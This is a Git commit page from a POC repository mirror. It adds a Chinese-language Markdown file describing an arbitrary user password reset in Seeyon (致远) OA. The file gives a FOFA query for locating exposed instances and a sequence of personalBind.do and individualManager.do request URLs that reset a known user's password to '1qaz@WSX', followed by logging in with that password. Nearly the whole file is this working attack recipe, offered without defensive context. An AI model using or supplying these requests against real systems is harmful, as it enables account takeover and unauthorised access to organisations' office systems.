crazywhalecc/POC00
1
0
Fork 0
mirror of https://github.com/wooluo/POC00.git synced 2026-03-17 23:54:51 +08:00
Code Issues Packages Projects Releases Wiki Activity

Create 致远前台任意用户密码修改.md

Browse Source
This commit is contained in:
wy876 2024-03-09 14:58:45 +08:00 committed by GitHub
parent aef68b0dda
commit 811fd99a60
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 27 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

27
致远前台任意用户密码修改.md Normal file
View File

@ -0,0 +1,27 @@
## 致远前台任意用户密码修改
## fofa
```
app="致远互联-OA"
```
## 漏洞复现
前提需要知道用户名
`http://xx.xx.xx.xx/seeyon/personalBind.do?method=retrievePassword`
<img width="1057" alt="image-20240301101704702" src="https://github.com/wy876/POC/assets/139549762/9562a165-151e-421c-a26c-7e09bf199368">
`http://xx.xx.xx.xx/seeyon/personalBind.do?method=sendVerificationCodeToBindNum&type=validate&origin=zx`
<img width="1047" alt="image-20240301101722837" src="https://github.com/wy876/POC/assets/139549762/c1ea9e86-1a92-4aaa-945d-a1a45c83509e">
修改密码为`1qaz@WSX`
`http://xx.xx.xx.xx/seeyon/individualManager.do?method=resetPassword&nowpwd=1qaz@WSX`
<img width="1217" alt="image-20240301101802224" src="https://github.com/wy876/POC/assets/139549762/5375cccc-0a9b-4ae0-8e3e-177aa67290b1">
最后使用修改的密码登录
<img width="1054" alt="image-20240301101840756" src="https://github.com/wy876/POC/assets/139549762/261afdc9-a728-4302-96a6-e0e19d02d338">